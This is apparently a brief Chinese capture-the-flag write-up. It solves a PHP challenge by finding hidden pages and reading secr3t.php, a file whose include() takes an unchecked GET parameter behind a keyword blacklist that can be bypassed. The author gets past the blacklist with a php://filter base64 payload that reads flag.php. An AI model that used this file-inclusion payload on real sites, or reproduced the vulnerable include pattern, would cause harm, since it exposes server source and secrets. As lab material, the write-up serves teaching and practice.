最后更新于3年前
文件包含配合伪协议读取文件
http
抓包发现隐藏的链接Archive_room.php,访问发现新的链接action.php,接着抓包
访问secr3t.php
<?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag放在了flag.php里 ?>
访问secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php即可
secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php